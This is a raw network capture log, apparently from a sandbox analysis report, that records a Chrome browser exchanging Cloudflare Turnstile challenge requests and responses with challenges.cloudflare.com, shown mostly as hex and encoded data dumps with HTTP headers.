                                                            2025-01-07 20:29:01 UTC1369INData Raw: 69 5a 59 39 67 6e 6e 56 70 6a 61 6d 70 61 34 61 4d 6a 72 47 78 69 36 4b 46 6b 59 65 6f 6e 49 2b 48 68 37 56 38 6a 62 43 55 74 61 47 52 68 72 66 42 78 63 71 31 74 59 44 51 78 37 2f 4a 76 37 57 6e 70 71 33 57 79 70 66 46 32 61 76 64 6e 35 71 65 75 4d 37 68 6f 4e 4c 61 6d 73 43 32 71 4b 50 48 71 4c 6e 4d 77 75 37 73 37 38 54 42 72 39 65 7a 78 62 50 70 30 39 54 67 30 67 44 33 31 64 58 34 41 50 66 6a 2b 4f 4c 63 42 63 76 36 41 64 76 4a 44 67 55 4d 37 51 34 4d 30 64 63 4b 31 68 58 77 45 74 30 67 33 78 4c 65 49 2f 67 61 35 53 62 6d 2b 67 7a 39 35 77 41 72 34 68 38 47 4a 41 45 65 41 53 34 4e 42 4f 7a 35 39 68 67 51 4b 45 48 36 50 78 56 43 50 69 54 35 42 42 30 5a 49 6a 30 70 49 42 67 4c 4d 7a 41 50 56 6b 41 55 54 43 70 52 4d 69 39 65 47 46 49 79 59 6b 46 44 54 7a
                                                            Data Ascii: iZY9gnnVpjampa4aMjrGxi6KFkYeonI+Hh7V8jbCUtaGRhrfBxcq1tYDQx7/Jv7Wnpq3WypfF2avdn5qeuM7hoNLamsC2qKPHqLnMwu7s78TBr9ezxbPp09Tg0gD31dX4APfj+OLcBcv6AdvJDgUM7Q4M0dcK1hXwEt0g3xLeI/ga5Sbm+gz95wAr4h8GJAEeAS4NBOz59hgQKEH6PxVCPiT5BB0ZIj0pIBgLMzAPVkAUTCpRMi9eGFIyYkFDTz
                                                            2025-01-07 20:29:01 UTC1369INData Raw: 69 4a 6d 41 65 61 61 62 71 59 69 4a 73 36 52 79 69 62 4a 73 65 59 71 4c 63 4c 6d 50 73 35 32 51 6e 38 47 5a 6e 63 50 43 6e 73 43 6d 78 59 71 34 67 73 53 68 68 61 36 67 31 4c 57 76 78 4a 6d 78 6c 70 50 59 33 71 37 67 75 62 76 44 73 4e 61 6c 30 36 4f 6a 6f 2b 50 70 79 4e 65 38 79 63 53 39 77 73 62 4f 74 75 48 47 38 65 72 4c 2f 4f 69 31 34 62 50 61 74 64 44 30 76 37 2b 2b 43 75 50 7a 2b 50 6f 4c 33 39 72 68 38 63 2f 53 42 4f 59 45 42 77 6a 34 47 2b 6f 53 2b 4f 66 70 2b 64 2f 35 37 76 62 77 37 78 62 32 47 75 59 63 39 51 6e 33 42 67 2f 74 4a 54 49 43 44 68 4d 56 4e 41 67 76 4c 52 34 78 41 44 45 67 4e 52 34 67 45 30 4a 47 42 6b 49 56 50 51 51 46 49 6b 6b 62 48 69 63 47 46 52 42 45 53 45 31 53 4e 46 31 63 50 31 34 75 59 6a 42 65 51 6d 46 56 55 6a 52 53 56 47 4a
                                                            Data Ascii: iJmAeaabqYiJs6RyibJseYqLcLmPs52Qn8GZncPCnsCmxYq4gsShha6g1LWvxJmxlpPY3q7gubvDsNal06Ojo+PpyNe8ycS9wsbOtuHG8erL/Oi14bPatdD0v7++CuPz+PoL39rh8c/SBOYEBwj4G+oS+Ofp+d/57vbw7xb2GuYc9Qn3Bg/tJTICDhMVNAgvLR4xADEgNR4gE0JGBkIVPQQFIkkbHicGFRBESE1SNF1cP14uYjBeQmFVUjRSVGJ
                                                            2025-01-07 20:29:01 UTC1369INData Raw: 5a 4b 6a 6e 6e 43 46 71 37 53 4e 6d 6f 57 7a 74 59 79 4e 6b 59 75 66 73 35 36 75 73 70 7a 4b 76 63 47 37 69 37 2f 4c 7a 35 2b 45 7a 59 72 4f 70 61 54 4f 72 35 72 63 7a 35 62 61 74 72 79 63 72 35 6d 75 74 37 37 62 78 65 43 37 31 39 62 6a 76 2b 76 6d 35 4e 72 4d 73 2f 58 67 77 37 53 79 30 75 76 77 30 38 2f 6f 31 65 7a 37 79 2b 44 78 77 74 6a 7a 34 4f 66 58 41 50 37 32 35 51 59 4c 7a 75 2f 6e 37 2f 54 75 43 75 2f 6c 35 68 45 61 31 78 58 53 37 75 4c 67 41 66 41 46 4b 50 34 61 43 67 6f 5a 4a 52 38 61 4b 53 41 44 44 41 6b 56 42 75 6b 70 4d 7a 6a 79 4e 42 45 4c 2f 76 67 52 50 2f 6f 77 48 52 44 39 52 79 56 47 42 55 59 68 4a 69 6c 53 4d 55 4d 4d 51 7a 56 54 4c 53 6b 56 46 6a 55 30 56 52 30 32 47 7a 6c 69 4c 44 78 48 48 56 30 6a 56 78 31 42 61 6a 31 4a 62 31 4a 52
                                                            Data Ascii: ZKjnnCFq7SNmoWztYyNkYufs56uspzKvcG7i7/Lz5+EzYrOpaTOr5rcz5batrycr5mut77bxeC719bjv+vm5NrMs/Xgw7Sy0uvw08/o1ez7y+Dxwtjz4OfXAP725QYLzu/n7/TuCu/l5hEa1xXS7uLgAfAFKP4aCgoZJR8aKSADDAkVBukpMzjyNBEL/vgRP/owHRD9RyVGBUYhJilSMUMMQzVTLSkVFjU0VR02GzliLDxHHV0jVx1Baj1Jb1JR
                                                            2025-01-07 20:29:01 UTC1369INData Raw: 69 4c 76 4c 71 72 6b 5a 6d 31 65 48 68 36 6c 73 52 34 75 59 4b 68 75 37 36 5a 70 4a 6e 42 6a 61 72 44 69 36 53 74 7a 70 65 67 78 64 48 55 33 4b 33 57 6e 63 43 32 72 62 2b 6b 73 39 50 62 31 64 50 68 75 37 76 70 71 72 72 4d 6f 2b 50 76 30 74 37 6c 37 38 72 59 39 72 50 46 38 4d 6e 48 36 65 47 38 30 75 33 45 42 51 4f 2b 78 38 6f 4c 43 77 7a 6e 33 77 6f 44 45 50 37 4e 30 38 7a 32 45 73 76 7a 47 76 33 70 44 74 62 6f 37 50 6f 56 4a 66 4d 55 43 50 33 66 38 77 51 62 2b 41 6a 37 42 67 45 79 38 67 77 42 41 43 34 6b 36 2b 7a 78 4e 67 66 30 4e 66 34 41 51 68 77 65 46 54 51 78 42 67 6c 49 48 42 38 4e 50 6b 45 49 49 51 6b 50 51 52 56 47 54 6a 6b 5a 4d 31 55 55 48 56 74 68 57 69 78 52 58 53 49 77 5a 42 34 66 4f 55 49 33 62 54 6f 35 58 6b 59 6b 63 6b 63 30 51 6b 35 71 57
                                                            Data Ascii: iLvLqrkZm1eHh6lsR4uYKhu76ZpJnBjarDi6StzpegxdHU3K3WncC2rb+ks9Pb1dPhu7vpqrrMo+Pv0t7l78rY9rPF8MnH6eG80u3EBQO+x8oLCwzn3woDEP7N08z2EsvzGv3pDtbo7PoVJfMUCP3f8wQb+Aj7BgEy8gwBAC4k6+zxNgf0Nf4AQhweFTQxBglIHB8NPkEIIQkPQRVGTjkZM1UUHVthWixRXSIwZB4fOUI3bTo5XkYkckc0Qk5qW
                                                            2025-01-07 20:29:01 UTC1369INData Raw: 41 72 72 69 76 64 72 53 37 6d 48 36 33 73 71 43 4c 76 4b 32 68 77 62 36 4e 77 36 58 53 70 4e 65 59 30 64 50 62 6c 4e 66 58 79 39 37 4b 74 73 79 79 33 39 2f 42 6f 2b 4b 38 70 2b 62 6d 71 4e 65 75 36 39 50 49 72 39 2f 72 72 36 72 6f 75 4c 6a 4b 35 2f 4f 78 79 66 65 38 42 4e 48 76 2f 74 79 2b 2b 64 6f 41 79 77 6e 32 79 42 48 37 34 42 51 52 44 78 41 41 79 68 54 59 31 42 55 62 37 51 6a 65 48 41 54 34 33 78 41 63 33 39 6f 5a 36 4f 6a 36 47 43 54 68 2b 53 6a 73 4e 41 49 67 4c 77 33 75 4b 67 73 77 2b 79 63 52 2f 44 30 39 4c 42 62 32 50 78 6f 37 52 30 52 45 48 67 68 4c 53 45 52 4c 54 7a 30 64 44 6c 49 56 4a 6a 52 47 4b 69 30 64 53 31 56 4d 45 31 46 59 4e 52 74 55 54 7a 30 6f 57 55 6f 2b 58 6c 73 71 59 45 4a 76 51 58 52 78 62 33 42 67 4b 33 5a 4f 63 55 74 35 65 46
                                                            Data Ascii: ArrivdrS7mH63sqCLvK2hwb6Nw6XSpNeY0dPblNfXy97Ktsyy39/Bo+K8p+bmqNeu69PIr9/rr6rouLjK5/Oxyfe8BNHv/ty++doAywn2yBH74BQRDxAAyhTY1BUb7QjeHAT43xAc39oZ6Oj6GCTh+SjsNAIgLw3uKgsw+ycR/D09LBb2Pxo7R0REHghLSERLTz0dDlIVJjRGKi0dS1VME1FYNRtUTz0oWUo+XlsqYEJvQXRxb3BgK3ZOcUt5eF
                                                            2025-01-07 20:29:01 UTC1369INData Raw: 78 38 6a 44 77 6f 53 45 79 36 47 74 69 63 71 37 78 34 7a 4f 71 61 32 53 31 4b 32 32 70 4e 6a 47 6d 4e 72 63 32 38 75 64 34 4d 2f 42 70 4f 54 55 74 65 7a 6f 31 39 75 71 37 4d 58 46 72 65 2b 30 36 36 2f 33 7a 63 32 33 2b 65 66 6e 2b 2f 33 72 36 37 73 41 78 50 54 51 42 41 54 33 44 67 6e 68 41 41 73 4f 2b 73 77 56 45 51 48 68 47 52 50 74 37 64 4d 59 33 50 6b 68 48 76 55 43 33 43 54 35 2f 53 6b 6d 45 2b 54 6d 4b 4f 77 4b 4b 79 30 47 44 2f 77 77 39 41 37 7a 4e 69 51 6f 39 54 6f 53 4c 50 6f 39 4c 51 35 47 51 6a 41 6d 41 6b 55 65 4e 41 6c 48 49 69 34 4c 55 43 59 71 44 6c 45 71 4d 6c 70 57 52 43 35 58 57 54 4a 52 4b 56 34 32 50 6d 42 69 4f 6c 77 6a 5a 56 4d 6c 4a 47 64 5a 4f 6e 46 74 4d 57 67 77 63 48 42 4f 65 6e 5a 4f 62 55 56 36 55 6c 59 34 66 48 78 57 50 34 46
                                                            Data Ascii: x8jDwoSEy6Gticq7x4zOqa2S1K22pNjGmNrc28ud4M/BpOTUtezo19uq7MXFre+066/3zc23+efn+/3r67sAxPTQBAT3DgnhAAsO+swVEQHhGRPt7dMY3PkhHvUC3CT5/SkmE+TmKOwKKy0GD/ww9A7zNiQo9ToSLPo9LQ5GQjAmAkUeNAlHIi4LUCYqDlEqMlpWRC5XWTJRKV42PmBiOlwjZVMlJGdZOnFtMWgwcHBOenZObUV6UlY4fHxWP4F


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.1649735104.18.95.414436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:29:01 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1660689700:1736278100:0ZQQSFYZPedfX4O_ZYTMwMWkRQdIEiHqnm_WVkeJqJc/8fe6b271e95a19cb/b1kyRIitPK7rAruZNHAEw1s0NrT3tJg6Z9P4eP.Z10E-1736281735-1.1.1.1-P2cVOniWS7c.B83YFhJ3BYHkTauv6gJpPKSU9cTM8LlbLUtTtzE5a_PbshBTYIpL HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:29:01 UTC379INHTTP/1.1 404 Not Found
                                                            Date: Tue, 07 Jan 2025 20:29:01 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 7
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            cf-chl-out: zk9Yi/vWnNtc/xzyB6PjPNY25AApisf2T/M=$1BVcANVfrfGZqz2A
                                                            Server: cloudflare
                                                            CF-RAY: 8fe6b295d86e7d24-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 20:29:01 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                            Data Ascii: invalid


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.1649739104.18.95.414436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:29:06 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1660689700:1736278100:0ZQQSFYZPedfX4O_ZYTMwMWkRQdIEiHqnm_WVkeJqJc/8fe6b271e95a19cb/b1kyRIitPK7rAruZNHAEw1s0NrT3tJg6Z9P4eP.Z10E-1736281735-1.1.1.1-P2cVOniWS7c.B83YFhJ3BYHkTauv6gJpPKSU9cTM8LlbLUtTtzE5a_PbshBTYIpL HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 35274
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            Content-type: application/x-www-form-urlencoded
                                                            CF-Chl-RetryAttempt: 0
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            CF-Challenge: b1kyRIitPK7rAruZNHAEw1s0NrT3tJg6Z9P4eP.Z10E-1736281735-1.1.1.1-P2cVOniWS7c.B83YFhJ3BYHkTauv6gJpPKSU9cTM8LlbLUtTtzE5a_PbshBTYIpL
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://challenges.cloudflare.com
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/7vyul/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:29:06 UTC16384OUTData Raw: 76 5f 38 66 65 36 62 32 37 31 65 39 35 61 31 39 63 62 3d 77 4e 78 53 34 4a 6b 57 76 4a 76 42 78 42 41 6b 6a 46 78 53 5a 78 4d 70 75 56 24 76 4d 33 4e 6e 38 66 6e 73 38 56 36 57 6e 68 6e 50 50 6b 33 50 6e 52 72 4a 53 39 50 36 4b 6b 36 6e 72 63 38 6e 72 48 6e 67 67 43 39 53 7a 6e 64 50 42 51 77 6e 6e 45 50 50 76 53 77 78 6b 46 38 25 32 62 53 42 74 6e 77 43 69 53 6e 36 6e 36 55 61 6d 6e 78 39 6e 2d 71 71 64 61 50 6e 35 41 4f 50 6e 45 4a 6a 70 63 38 50 47 53 77 76 53 4c 53 53 36 39 6b 35 6e 6b 57 6e 4a 63 72 6e 32 45 48 66 50 32 67 74 4b 71 2d 53 33 78 43 76 53 6e 6f 6b 4b 64 48 53 53 77 46 41 6e 4d 41 6a 70 6c 76 4c 6e 6e 63 38 6e 6e 70 34 5a 75 46 4a 49 6e 50 72 6c 72 46 41 2d 69 59 48 53 54 45 32 48 33 46 57 52 54 6d 4c 6d 77 35 6b 65 74 64 4d 58 54 49 73
                                                            Data Ascii: v_8fe6b271e95a19cb=wNxS4JkWvJvBxBAkjFxSZxMpuV$vM3Nn8fns8V6WnhnPPk3PnRrJS9P6Kk6nrc8nrHnggC9SzndPBQwnnEPPvSwxkF8%2bSBtnwCiSn6n6Uamnx9n-qqdaPn5AOPnEJjpc8PGSwvSLSS69k5nkWnJcrn2EHfP2gtKq-S3xCvSnokKdHSSwFAnMAjplvLnnc8nnp4ZuFJInPrlrFA-iYHSTE2H3FWRTmLmw5ketdMXTIs
                                                            2025-01-07 20:29:06 UTC16384OUTData Raw: 37 36 79 50 59 24 6b 6e 47 30 61 30 59 6e 6b 4e 43 56 6b 72 6e 51 6e 2b 50 71 78 4a 39 6e 43 53 71 33 42 44 6e 32 50 4a 50 42 55 6e 43 53 4a 4c 6e 4b 6e 61 53 72 72 6b 39 50 2b 34 6b 56 6e 48 6e 66 6e 6e 47 53 44 6e 61 6e 6b 33 6b 72 6e 59 53 71 57 6e 65 6e 37 4f 6f 57 6b 24 6e 4d 72 6e 47 34 4d 39 72 53 77 78 6b 73 6e 4a 53 41 56 6e 6a 6e 52 53 46 76 6b 50 6e 61 53 64 76 42 6c 53 38 53 4d 39 6e 73 6e 47 53 64 39 6e 53 6e 47 41 4a 57 42 55 6e 4e 53 36 79 42 6c 53 41 53 78 75 6b 53 6b 32 50 46 70 4a 37 50 75 4e 6b 69 6b 66 37 4a 39 64 30 62 78 6e 66 6e 51 50 4a 4c 6e 4c 6e 41 76 4a 7a 6e 76 6e 52 56 6b 37 6e 79 53 78 76 4a 33 6e 63 6e 5a 39 42 52 6e 48 6e 47 56 4a 48 6e 48 53 72 78 4a 44 50 69 6e 44 78 42 59 6e 32 53 51 76 6e 52 6e 2b 4e 46 52 4a 75 6b 2d
                                                            Data Ascii: 76yPY$knG0a0YnkNCVkrnQn+PqxJ9nCSq3BDn2PJPBUnCSJLnKnaSrrk9P+4kVnHnfnnGSDnank3krnYSqWnen7OoWk$nMrnG4M9rSwxksnJSAVnjnRSFvkPnaSdvBlS8SM9nsnGSd9nSnGAJWBUnNS6yBlSASxukSk2PFpJ7PuNkikf7J9d0bxnfnQPJLnLnAvJznvnRVk7nySxvJ3ncnZ9BRnHnGVJHnHSrxJDPinDxBYn2SQvnRn+NFRJuk-
                                                            2025-01-07 20:29:06 UTC2506OUTData Raw: 78 44 65 79 57 6e 68 41 30 6e 74 30 38 34 33 36 34 63 65 69 71 6a 2b 57 42 43 53 67 35 79 6c 63 44 24 53 67 37 4b 6b 4b 33 79 41 34 6c 58 43 53 24 76 38 5a 46 24 6e 73 78 62 53 42 56 45 4f 6e 4a 57 6b 73 53 79 7a 66 55 36 43 53 6b 4e 50 67 4d 57 6e 53 68 4a 74 46 34 38 2b 47 2b 2b 4d 36 4b 4e 76 77 72 42 50 53 33 73 55 39 72 4b 6e 6b 73 71 56 6b 36 6e 30 76 65 66 69 53 6e 53 77 56 69 24 73 55 5a 75 47 75 35 6a 6e 61 2b 77 2d 79 33 6e 79 53 4a 41 63 78 63 66 53 72 4d 4d 4e 6e 37 53 6b 6f 47 65 50 38 56 78 33 6b 39 4f 58 2d 2b 4a 46 6e 77 74 72 52 56 6f 4f 46 75 33 41 49 36 69 38 6d 52 73 36 78 46 39 46 57 64 2d 6c 6c 62 6a 53 45 69 42 48 4f 4d 56 51 6a 6b 72 24 38 4d 38 57 6b 44 4b 67 5a 47 57 6b 36 6e 55 76 50 4b 68 74 35 7a 53 72 6a 77 59 77 32 4b 30 76
                                                            Data Ascii: xDeyWnhA0nt084364ceiqj+WBCSg5ylcD$Sg7KkK3yA4lXCS$v8ZF$nsxbSBVEOnJWksSyzfU6CSkNPgMWnShJtF48+G++M6KNvwrBPS3sU9rKnksqVk6n0vefiSnSwVi$sUZuGu5jna+w-y3nySJAcxcfSrMMNn7SkoGeP8Vx3k9OX-+JFnwtrRVoOFu3AI6i8mRs6xF9FWd-llbjSEiBHOMVQjkr$8M8WkDKgZGWk6nUvPKht5zSrjwYw2K0v
                                                            2025-01-07 20:29:07 UTC1256INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:29:07 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4624
                                                            Connection: close
                                                            cf-chl-out-s: LGJVkaD4U6iwslPPNv8GFi/4hPsxXmgxLPr4vEdgEs4ZA+5VqTVmkreqNYbksCxjsu69zYHK8yEy4EHIJzBwEZbj6pN02wK4yHga2gnJ9cY2gLIq8YUh8f3gBAqbFZGoo5FPh4FvalkTqD4aAx7FWOAQQ8591Jto64Etg/M/Rz2t1Ykf553DJU1GqK6kcRHQXENyzOCy0j0NWq1T9w13Y/ag6hPki7qhGSSIQDQGNkEkNCpHuF5uQlF4VK/glSmt3q/XrxaxJjD0gmt7Mg0XG1K8XC3ZsYgVz1gcvkltwsTVQ1fwravbnruf/ZY4/k/dGysj2QVaeAhTyDSPCOTAYd8sm6vG8aJjPKaspjZznd3xMrIhgKNKTVh2K4Nb6iVyFR7lKNwp9JW2DQ/XQJuVciNz6aq1WcJAvJOoTqRxVjEhhj/zV0XstYSwe1lYs+rmL/FzuNAtKCH9RLXDN/F/Evc9ANqJQ4jA2AcULvLjG458ssupg78LuWImK/aMBDHw20HNPPKNTuUqAh1EYVKQbiLNAip3x16QS0+sIf8yl1k/JR+eYbBIJxKadd7/fFSsW8GMR6MosqdnejXHff1jPpA2zx5QhgddZ8W8eyFvgRbtsyt5+6i2Ecuht4MmgFEHIPdx6dUc3a1zr7I8BIL74uVcrj9oo4ny2wmP7T6FuRZXts4+MxsWsLgDEbPE1HuMkikdo90uTAt+YKPHDAAojxtfcE8MKyuR1esbPU8wDGWX3bgZNJxJI1ah8yEy6oHafjiTZ8u3flDkxc0io5LZMKyG47bA5CE13ViNqlJVwbDMl/yY3KnkDyMoxGZFHh/VzMZ+Jz3tIgQxYTpBQKYUPtCWDs61US01GXJlhFW601WRdrblk846YNgahNpN+/ikgRo5ZajPG+wh86yWOglSQwu22esulHhA4HOaO2vG1iEkXyYZmV8eJYF4SkiRdR1w8p7hdrIyqoQySr6+Tj/49P7wVgfMzXF5R6k5FLDJNeJODCcuM+ [TRUNCATED]
                                                            2025-01-07 20:29:07 UTC221INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 39 6b 31 35 73 47 57 52 5a 54 4c 42 7a 6b 4e 37 2f 6c 77 36 6c 58 62 2f 48 62 2f 47 69 67 51 68 45 33 79 74 79 71 73 63 39 4e 76 49 30 6f 67 78 36 6a 51 6b 72 55 7a 30 50 36 4b 48 2b 57 36 62 72 54 32 36 37 64 65 38 50 37 46 52 30 34 42 51 36 55 50 7a 4b 45 66 54 70 51 2f 55 6d 61 4b 6c 38 54 54 7a 38 71 38 4a 73 51 3d 3d 24 75 37 77 58 77 6b 69 71 67 53 6e 74 69 62 4e 57 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 65 36 62 32 62 35 39 63 64 33 37 32 36 65 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                            Data Ascii: cf-chl-out: 9k15sGWRZTLBzkN7/lw6lXb/Hb/GigQhE3ytyqsc9NvI0ogx6jQkrUz0P6KH+W6brT267de8P7FR04BQ6UPzKEfTpQ/UmaKl8TTz8q8JsQ==$u7wXwkiqgSntibNWServer: cloudflareCF-RAY: 8fe6b2b59cd3726e-EWRalt-svc: h3=":443"; ma=86400
                                                            2025-01-07 20:29:07 UTC1261INData Raw: 59 34 56 74 65 57 78 2b 59 34 5a 54 62 46 61 51 55 58 6c 35 57 58 6d 67 65 34 36 6a 6e 33 4e 33 58 70 4b 6a 69 5a 6d 49 71 33 32 74 68 61 47 68 73 6f 4e 73 70 72 4f 52 6c 49 53 6a 73 34 36 79 70 37 65 53 72 4c 69 68 67 62 47 35 71 4c 71 78 79 37 69 73 72 4c 32 74 6b 4e 47 39 73 71 71 66 78 35 47 72 32 4c 61 36 73 72 53 6e 6c 61 76 62 6f 75 43 78 33 37 33 50 31 36 65 33 36 75 62 4b 75 39 2f 61 35 4f 65 70 72 75 7a 31 36 74 6e 72 31 39 62 5a 36 39 33 4e 32 65 6e 66 30 4f 50 78 33 2b 2f 61 31 64 62 37 32 4f 72 62 44 63 38 48 33 2b 7a 77 42 2b 6a 78 42 51 58 7a 46 41 6a 63 37 75 6a 66 47 65 38 54 2b 51 63 59 32 66 41 53 36 66 54 32 4a 67 34 4f 2b 43 41 7a 42 54 50 2b 38 78 67 43 43 79 34 46 4a 6a 62 2b 4b 53 34 31 47 6b 51 63 46 77 45 6d 4a 66 73 73 50 77 4d
                                                            Data Ascii: Y4VteWx+Y4ZTbFaQUXl5WXmge46jn3N3XpKjiZmIq32thaGhsoNsprORlISjs46yp7eSrLihgbG5qLqxy7isrL2tkNG9sqqfx5Gr2La6srSnlavbouCx373P16e36ubKu9/a5Oepruz16tnr19bZ693N2enf0OPx3+/a1db72OrbDc8H3+zwB+jxBQXzFAjc7ujfGe8T+QcY2fAS6fT2Jg4O+CAzBTP+8xgCCy4FJjb+KS41GkQcFwEmJfssPwM
                                                            2025-01-07 20:29:07 UTC1369INData Raw: 6b 49 62 42 53 41 66 52 51 6f 44 53 51 6f 58 4b 43 38 48 48 53 77 7a 45 79 46 45 47 45 77 59 44 56 4e 46 50 54 67 37 58 79 42 52 4e 78 38 63 50 30 63 62 53 46 68 41 4e 6a 35 4d 4b 6e 49 2f 4b 55 68 4b 56 48 4d 7a 5a 6b 5a 46 52 46 4a 4c 52 32 74 72 4f 49 4e 54 50 6c 64 30 59 46 68 5a 59 55 64 57 57 6e 39 66 54 31 43 51 6c 5a 42 49 62 31 4f 46 65 59 35 58 64 32 75 65 69 6d 74 71 67 4a 36 51 63 4a 61 6a 6e 48 64 30 61 34 70 6b 72 34 69 4c 61 48 79 31 72 6e 36 51 63 36 6d 46 63 33 65 6c 6a 4b 2b 54 77 71 4f 68 6f 38 4b 53 6e 58 2b 53 6d 4b 6a 4c 76 35 71 2b 73 4b 43 53 77 71 4f 4f 6f 71 37 53 72 72 6d 6b 6c 38 79 39 75 4e 47 61 72 4f 47 38 76 4c 53 77 32 74 4b 71 75 4b 76 4f 7a 4d 69 38 79 38 44 77 73 2b 69 2b 30 50 50 6e 32 65 2f 45 7a 4d 77 41 79 65 6e 51
                                                            Data Ascii: kIbBSAfRQoDSQoXKC8HHSwzEyFEGEwYDVNFPTg7XyBRNx8cP0cbSFhANj5MKnI/KUhKVHMzZkZFRFJLR2trOINTPld0YFhZYUdWWn9fT1CQlZBIb1OFeY5Xd2ueimtqgJ6QcJajnHd0a4pkr4iLaHy1rn6Qc6mFc3eljK+TwqOho8KSnX+SmKjLv5q+sKCSwqOOoq7Srrmkl8y9uNGarOG8vLSw2tKquKvOzMi8y8Dws+i+0PPn2e/EzMwAyenQ
                                                            2025-01-07 20:29:07 UTC1369INData Raw: 67 6e 49 79 4d 57 54 51 6f 78 4c 44 77 31 4d 52 55 73 49 79 59 31 45 7a 55 34 50 54 74 66 4d 7a 38 77 4d 56 46 42 51 45 56 41 53 44 67 35 53 55 73 37 4b 45 74 4d 4b 69 78 70 62 6b 46 77 4d 7a 46 4e 5a 33 42 54 50 33 6c 52 4f 56 78 56 67 6e 4e 36 65 6f 6c 43 68 6c 74 69 69 6d 57 46 61 5a 43 4f 58 33 4a 4e 6b 6e 4f 4d 6c 48 42 35 6a 46 36 4f 56 6e 2b 62 66 70 43 4f 65 48 35 7a 68 57 70 30 64 57 6d 64 70 4b 4f 74 6f 6f 6d 77 73 34 47 6a 75 49 75 74 73 71 79 6f 73 71 43 4b 73 4c 53 56 6d 72 69 61 77 4c 57 78 76 62 79 74 67 36 6d 76 73 63 76 4c 71 4b 2b 78 30 72 61 4b 30 39 57 75 30 61 72 58 72 38 33 57 33 72 50 44 30 65 65 6d 30 64 57 6d 35 65 69 66 70 39 6d 36 76 4f 37 49 72 65 2b 79 38 66 44 32 36 74 48 48 78 51 44 52 2b 66 57 35 74 65 33 36 42 51 50 54 31
                                                            Data Ascii: gnIyMWTQoxLDw1MRUsIyY1EzU4PTtfMz8wMVFBQEVASDg5SUs7KEtMKixpbkFwMzFNZ3BTP3lROVxVgnN6eolChltiimWFaZCOX3JNknOMlHB5jF6OVn+bfpCOeH5zhWp0dWmdpKOtoomws4GjuIutsqyosqCKsLSVmriawLWxvbytg6mvscvLqK+x0raK09Wu0arXr83W3rPD0eem0dWm5eifp9m6vO7Ire+y8fD26tHHxQDR+fW5te36BQPT1
                                                            2025-01-07 20:29:07 UTC625INData Raw: 74 53 77 55 7a 4c 51 38 71 52 53 70 48 56 51 34 58 47 46 4e 63 59 6b 39 66 54 47 5a 57 55 57 6c 62 57 57 55 71 52 57 77 2f 54 6d 31 68 53 43 5a 76 4c 32 4a 48 51 32 70 6d 52 6a 51 32 54 32 6c 62 67 30 4b 42 65 33 52 45 52 6e 74 45 64 46 64 34 66 57 39 71 57 35 4f 49 55 6e 4b 51 67 34 47 51 6c 31 74 72 66 5a 65 4b 55 6c 6d 65 6a 33 36 6a 6c 6e 75 51 65 61 56 6c 59 6e 56 70 61 71 57 6d 62 4b 31 79 69 48 4f 4b 70 49 68 32 73 5a 65 55 72 70 2b 74 73 62 36 58 6a 70 62 46 6d 37 32 39 75 63 65 35 6e 63 2b 34 68 73 6a 54 79 49 71 79 7a 38 79 56 6c 4d 69 57 79 4b 33 64 79 4d 7a 62 6e 74 36 37 74 64 58 54 73 37 54 59 35 74 7a 6f 37 4f 58 52 70 2f 48 52 39 63 36 78 37 2f 6a 33 74 4f 66 61 75 4f 37 65 76 76 58 38 34 2b 50 59 39 64 66 31 41 50 6a 47 2b 51 4d 4b 35 51
                                                            Data Ascii: tSwUzLQ8qRSpHVQ4XGFNcYk9fTGZWUWlbWWUqRWw/Tm1hSCZvL2JHQ2pmRjQ2T2lbg0KBe3RERntEdFd4fW9qW5OIUnKQg4GQl1trfZeKUlmej36jlnuQeaVlYnVpaqWmbK1yiHOKpIh2sZeUrp+tsb6XjpbFm729uce5nc+4hsjTyIqyz8yVlMiWyK3dyMzbnt67tdXTs7TY5tzo7OXRp/HR9c6x7/j3tOfauO7evvX84+PY9df1APjG+QMK5Q


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
